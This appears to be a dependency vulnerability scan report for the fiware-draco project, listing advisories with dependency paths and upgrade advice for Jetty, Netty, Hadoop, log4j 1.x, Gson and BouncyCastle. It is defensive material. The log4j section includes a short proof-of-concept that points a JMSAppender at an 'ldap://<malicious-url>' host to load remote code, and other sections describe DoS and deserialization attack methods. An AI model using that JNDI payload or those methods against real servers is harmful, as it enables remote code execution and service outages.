org.eclipse.jetty:jetty-servlets is an Utility Servlets from Jetty

Affected versions of this package are vulnerable to Denial of Service (DoS) via the DosFilter process. An attacker can exhaust the server's memory and cause a denial of service by repeatedly sending crafted requests that trigger OutOfMemory errors.

Note:

This is only exploitable if the server does not have session passivation or an aggressive session inactivation timeout configured.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade org.eclipse.jetty:jetty-servlets to version 9.4.54, 10.0.18, 11.0.18 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-common
  • Introduced through: org.apache.nifi:nifi-processor-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) due to the extraneous reading of a Linux environment file when loaded on a Windows application. An attacker can cause the application to crash by creating a large file in C:\etc\os-release or C:\usr\lib\os-release which the application attempts to load. If the file exceeds the JVM's memory limit (1 GB by default) the application will crash when loading it into memory.

Note: This vulnerability affects only Windows environments.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-common to version 4.1.115.Final or higher.

References

medium severity

Improper Validation of Specified Quantity in Input

  • Vulnerable module: io.netty:netty-common
  • Introduced through: org.apache.nifi:nifi-processor-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final

Overview

Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in BufferedReader.readLine(), which does not count null bytes when calculating the acceptable size of an input stream. An attacker can cause the application to crash by creating a large file in C:\etc\os-release or C:\usr\lib\os-release which the application attempts to load. If the file exceeds the JVM's memory limit (1 GB by default) the application will crash when loading it into memory.

Note: This vulnerability affects only Windows environments and is a bypass for the previously reported and fixed CVE-2024-47535.

Remediation

Upgrade io.netty:netty-common to version 4.1.118, 4.2.0.RC3 or higher.

References

medium severity

Creation of Temporary File in Directory with Insecure Permissions

  • Vulnerable module: org.apache.hadoop:hadoop-common
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.

Overview

org.apache.hadoop:hadoop-common is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models.

Affected versions of this package are vulnerable to Creation of Temporary File in Directory with Insecure Permissions in the RunJar.run() method. If sensitive data is stored in this file, a local attacker can view it by accessing the temporary directory where this data is stored.

Note:

This vulnerability can only be exploited on unix-like systems, where the system temporary directory is shared between all local users.

Remediation

Upgrade org.apache.hadoop:hadoop-common to version 3.4.0 or higher.

References

medium severity

Arbitrary Code Execution

  • Vulnerable module: log4j:log4j
  • Introduced through: org.slf4j:slf4j-log4j12@1.7.32

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.slf4j:slf4j-log4j12@1.7.32 log4j:log4j@1.2.17

Overview

log4j:log4j is a 1.x branch of the Apache Log4j project. Note: Log4j 1.x reached End of Life in 2015, and is no longer supported.

Affected versions of this package are vulnerable to Arbitrary Code Execution.
Note: Even though this vulnerability appears to be related to the log4j 2.x vulnerability, the 1.x branch of the module requires an attacker to have access to modify configurations to be exploitable, which is rarely possible.

In order to leverage this vulnerability the following conditions must be met:

  1. The application has enabled JMSAppender (or a class that extends JMSAppender)
  2. The attacker has access to directly modify the TopicBindingName or TopicConnectionFactoryBindingName configuration variables - which is an unlikely scenario

If these conditions are met, log4j 1.x allows a lookup feature that does not protect against attacker-controlled LDAP and other JNDI related endpoints. Therefore, an attacker with access to the aforementioned configuration variables is able to execute arbitrary code when loaded from an LDAP server.

PoC

import org.apache.log4j.net.JMSAppender;
// ...
JMSAppender a = new JMSAppender();
a.setTopicConnectionFactoryBindingName("ldap://<malicious-url>");
// OR a.setTopicBindingName("ldap://<malicious-url>");
a.activateOptions();

Remediation

There is no fixed version for log4j:log4j.

References

medium severity

Deserialization of Untrusted Data

  • Vulnerable module: com.google.code.gson:gson
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.code.gson:gson@2.2.4
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.2.

Overview

Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the writeReplace() method in internal classes, which may allow a denial of service attack if combined with another exploit.

Details

Serialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like Remote Method Invocation (RMI), Java Management Extension (JMX), Java Messaging System (JMS), Action Message Format (AMF), Java Server Faces (JSF) ViewState, etc.

Deserialization of untrusted data (CWE-502), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.

Java deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a popular library (Apache Commons Collection). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.

An attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.

Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).

Remediation

Upgrade com.google.code.gson:gson to version 2.8.9 or higher.

References

medium severity

HTTP Request Smuggling

  • Vulnerable module: io.netty:netty
  • Introduced through: io.netty:netty@3.10.6.Final

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 io.netty:netty@3.10.6.Final

Overview

io.netty:netty is a NIO client server framework which enables quick and easy development of network applications such as protocol servers and clients.

Affected versions of this package are vulnerable to HTTP Request Smuggling. Netty mishandles whitespace before the colon in HTTP headers such as a Transfer-Encoding : chunked line. This can lead to HTTP request smuggling where an attacker can bypass security controls, gain unauthorized access to sensitive data, and directly compromise other application users.

Note:

io.netty:netty is deprecated. Users should update to io.netty:netty-all

Remediation

There is no fixed version for io.netty:netty.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: io.netty:netty-handler
  • Introduced through: org.apache.nifi:nifi-processor-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final

Overview

io.netty:netty-handler is a library that provides an asynchronous event-driven network application framework and tools for rapid development of maintainable high performance and high scalability protocol servers and clients. In other words, Netty is a NIO client server framework which enables quick and easy development of network applications such as protocol servers and clients. It greatly simplifies and streamlines network programming such as TCP and UDP socket server.

Affected versions of this package are vulnerable to Denial of Service (DoS) such that if the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which leads the server to buffer up to 16MB of data per connection.

The SniHandler class is a handler that waits for the TLS handshake to configure a SslHandler according to the indicated server name by the ClientHello record. For this matter it allocates a ByteBuf using the value defined in the ClientHello record.

Note:

An attacker can craft a packet that makes the SslClientHelloHandler to:

  1. Allocate a 16MB ByteBuf.

  2. Not fail decode method in buffer.

  3. Get out of the loop without an exception.

The combination of this without the use of a timeout makes it easy to connect to a TCP server and allocate 16MB of heap memory per connection.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade io.netty:netty-handler to version 4.1.94.Final or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the ASN1ObjectIdentifier. An attacker can cause excessive resource consumption by submitting specially crafted ASN.1 Object Identifiers, potentially leading to service disruption.

Note: This issue only applies to applications which do consume unvetted, or otherwise unvalidated, ASN.1 encodings.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper processing of large name constraint structures in PKIXCertPathReviewer. An attacker can cause excessive resource allocation by submitting specially crafted ASN.1 objects, potentially leading to service disruption.

Workaround

This vulnerability can be mitigated by limiting the size of ASN.1 objects that can be loaded from untrusted sources, thereby capping the maximum size of a Name Constraints structure.

Remediation

A fix was pushed into the master branch but not yet published.

References

medium severity

Improper Validation of Syntactic Correctness of Input

  • Vulnerable module: org.eclipse.jetty:jetty-http
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.2.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
